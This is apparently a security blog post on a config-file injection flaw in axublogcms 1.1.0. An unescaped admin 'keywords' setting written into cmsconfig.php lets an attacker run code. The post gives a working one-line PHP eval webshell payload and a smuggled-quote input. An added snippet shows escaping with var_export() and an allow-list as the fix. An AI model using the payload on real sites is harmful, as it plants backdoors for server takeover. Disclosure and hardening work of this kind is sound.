axublogcms1.1.0 Latest Version Getshell
Code execution vulnerability
The latest version is now 1.1.0. Today I re-audited axublogcms 1.0.6 and found a fairly marginal vulnerability; it exists not only in version 1.0.6 but in the latest version as well.
The admin backend writes to a configuration file, which leads directly to getshell.
Download the latest version of the source code and install it; for the installation steps, see the previous article (http://www.cnblogs.com/Oran9e/p/7846987.html).
After a successful installation, log in to the admin backend.
In the basic settings, the input is not filtered, so it can be written into the configuration file, which results in code execution.
Code analysis
./ad/setconfig.php, lines 97 and 102
The submitted parameter $webkeywords is substituted in directly, without any escaping.
So a one-line webshell can be written here. Line 97 shows that the cmsconfig.php file is included directly, so the one-liner is written straight into the cmsconfig.php file.
Insert the one-liner in the keywords field. The preceding webkeywords value has to be closed, along with its double quotation marks; otherwise the resulting PHP file is malformed and will not run.
For example: 123456";@eval($_POST['a']);$a="
Now look at what has been written to /cmsconfig.php.
The write succeeded; next, verify it.
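The weakness described above, as an added example that is not part of the original post or of axublogcms: a value pasted between double quotes in a generated PHP config file, next to the same value serialized with var_export(), with the tokenizer used to compare the two results. The function names, the one-setting config layout and the sample input are assumptions.

```php
<?php
// Added illustration; function names and the config layout are assumptions,
// not code from axublogcms.

// Weak pattern: the submitted value is pasted between double quotes.
function render_config_unsafe(string $keywords): string {
    return "<?php\n\$webkeywords = \"" . $keywords . "\";\n";
}

// Hardened pattern: var_export() emits a single-quoted literal with ' and \
// escaped, so the value cannot end the string it is stored in.
function render_config_safe(string $keywords): string {
    return "<?php\n\$webkeywords = " . var_export($keywords, true) . ";\n";
}

// Defence in depth: a keyword list only needs letters, digits and , . _ - space.
function is_valid_keywords(string $keywords): bool {
    return preg_match('/^[\p{L}\p{N} ,._-]{0,200}$/u', $keywords) === 1;
}

// A file holding one setting must tokenize to exactly one statement.
function count_statements(string $php): int {
    $count = 0;
    foreach (token_get_all($php) as $token) {
        if ($token === ';') {
            $count++;
        }
    }
    return $count;
}

// Constructed input: closes the quote and appends a harmless extra assignment.
$input = 'blog, php"; $injected = true; $a = "';

printf("unsafe: %d statement(s)\n", count_statements(render_config_unsafe($input)));
printf("safe:   %d statement(s)\n", count_statements(render_config_safe($input)));
printf("passes allow-list: %s\n", is_valid_keywords($input) ? 'yes' : 'no');
```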
Source Link (Link: https://pan.baidu.com/s/1QML_lTny4h30n2mH4uKTeA password: di3b)
Link to this article: http://www.cnblogs.com/Oran9e/p/8981705.html. Reprinting without permission is prohibited.